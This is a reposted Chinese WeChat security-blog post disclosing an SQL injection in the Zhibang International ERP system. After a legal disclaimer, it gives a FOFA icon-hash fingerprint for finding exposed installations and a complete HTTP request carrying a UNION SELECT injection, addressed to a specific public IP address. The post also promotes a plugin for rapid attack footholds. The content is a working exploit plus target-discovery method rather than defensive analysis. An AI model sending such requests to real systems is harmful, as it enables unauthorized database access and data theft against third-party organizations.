0x01 技术文章仅供参考学习,请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文所提供的技术信息或代码工具仅供于学习,一切不良后果与文章作者无关。使用者应该遵守法律法规,并尊重他人的合法权益。
0x02 指纹信息
FOFA:icon_hash="-682445886"
0x03 漏洞复现
数据包
GET /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=1%20union%20select%20@@version-- HTTP/1.1
Host: 113.116.2.214:2869
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
0x04 漏洞检测插件
最近闲着没事在写一个漏洞合集插件实现工具化,快速化打点这些,后续还会写更多漏洞也会写上自己审计的一些漏洞。工具目前不开放后续写的差不多了会放在github上到时间单独写一篇公众号说怎么使用。
喜欢的话记得点关注呀
原文始发于微信公众号(Kokoxca安全):智邦国际erp系统存在SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论